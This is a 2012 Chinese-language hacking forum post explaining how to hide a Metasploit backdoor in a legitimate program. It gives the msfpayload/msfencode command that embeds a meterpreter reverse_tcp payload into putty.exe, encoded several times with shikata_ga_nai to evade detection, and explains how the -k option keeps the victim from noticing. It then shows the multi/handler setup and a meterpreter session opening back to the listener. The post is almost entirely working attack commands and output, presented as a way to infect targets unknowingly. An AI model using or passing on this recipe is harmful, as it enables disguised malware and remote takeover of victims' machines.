切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
12 Metasploit的捆绑后门[复制链接]
发表于 2012-8-5 20:47:42 | 显示全部楼层 |!read_mode!
绑定payload 至一个可执行文件,让目标不知不觉间中招,以putty.exe 为例:
  1. ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.105 R |./msfencode -t exe -x /tmp/putty.exe -k -o /tmp/putty_pro.exe -e x86/shikata_ga_nai -c 5
复制代码
假如选择一个GUI 界面的程序作为绑定目标并且不使用-k 选项,则目标执行此程序的时候不会弹出cmd 窗口,-k 选项的作用是payload 独立于模板软件的进程运行。
  1. root@Dis9Team:~# cd /pentest/exploits/framework
  2. root@Dis9Team:/pentest/exploits/framework# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.105 R |./msfencode -t exe -x /tmp/putty.exe -k -o /tmp/putty_pro.exe -e x86/shikata_ga_nai -c 5
  3. [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)

  4. [*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)

  5. [*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)

  6. [*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)

  7. [*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)

  8. root@Dis9Team:/pentest/exploits/framework# cd /tmp/
  9. root@Dis9Team:/tmp# ls
  10. keyring-YKheJc      putty.exe              ssh-fRFnTh1373
  11. orbit-root          putty_pro.exe          VMwareDnD
  12. pulse-9HlIWyeFffiQ  serverauth.qx1KlJ7xCM  vmware-root
  13. root@Dis9Team:/tmp#
复制代码
  1. msf > use exploit/multi/handler
  2. msf  exploit(handler) > set payload windows/meterpreter/reverse_tcp
  3. payload => windows/meterpreter/reverse_tcp
  4. msf  exploit(handler) > set lhost 192.168.1.105
  5. lhost => 192.168.1.105
  6. msf  exploit(handler) > exploit

  7. [*] Started reverse handler on 192.168.1.105:4444
  8. [*] Starting the payload handler...
  9. [*] Sending stage (752128 bytes) to 192.168.1.101
  10. [*] Meterpreter session 1 opened (192.168.1.105:4444 -> 192.168.1.101:1034) at 2012-02-28 18:10:10 +0800

  11. meterpreter >
复制代码



附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-12-2 04:52

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部